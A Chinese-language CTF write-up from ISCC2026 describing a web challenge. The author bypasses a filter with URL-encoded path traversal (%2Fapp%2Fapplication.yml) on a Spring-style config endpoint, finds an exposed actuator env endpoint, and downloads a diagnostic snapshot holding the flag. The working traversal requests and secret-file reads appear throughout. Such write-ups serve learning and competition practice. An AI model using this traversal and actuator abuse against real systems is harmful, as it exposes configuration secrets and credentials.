Web-逆向穿越

ISCC2026 WriteUp 提交模板

Web-逆向穿越

解题思路

1.先翻译一下

image.png

显然要去访问这个接口:/config/{app}/{profile}/{filename},猜测这里{filename}参数会被后端分割寻址,接受绝对地址或者相对地址

根据提示访问:http://39.105.213.28:12602/config/app/dev/application.yml
得到响应:server: port: 8080 hint: 'This is just a mock repository config. The real secrets are in the main application.yml at the system root (/app/application.yml).'
继续访问: http://39.105.213.28:12602/config/app/dev/app/application.yml ,发现访问不了,估计是waf了,URL编码尝试下/app/application.yml -> %2Fapp%2Fapplication%2Eyml
访问:http://39.105.213.28:12602/config/app/dev/%2Fapp%2Fapplication.yml
得到响应:server: port: 8080 spring: application: name: cloud-config-central management: endpoints: web: base-path: "/internal-monitor-xyz123" exposure: include: "env" endpoint: env: keys-to-sanitize: "password,secret,key,token,.*credentials.*,vcap_services,FLAG" system: diagnostic: auto-dump: true last-crash-time: "2026-03-10T08:15:32Z" backup-download-path: ${SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH}

发现关键内容:

  • management: endpoints: web: base-path: "/internal-monitor-xyz123"
  • backup-download-path: ${SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH}

先访问那个地址:

image.png

再访问那个有env的链接,出来了许多内容,根据上一步提示,我们搜索下SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH

image.png

访问:/api/v3/internal/dev/diagnostics/snapshot/8e2f1a4b.dat,下载下来

image.png|529

内容也是非常的多

image.png

搜了一下就都出来了ISCC{Double_Decode_Spring_Bingo_2026}

Exp

posted @ 2026-05-19 16:32  MillionMind  阅读(8)  评论(0)    收藏  举报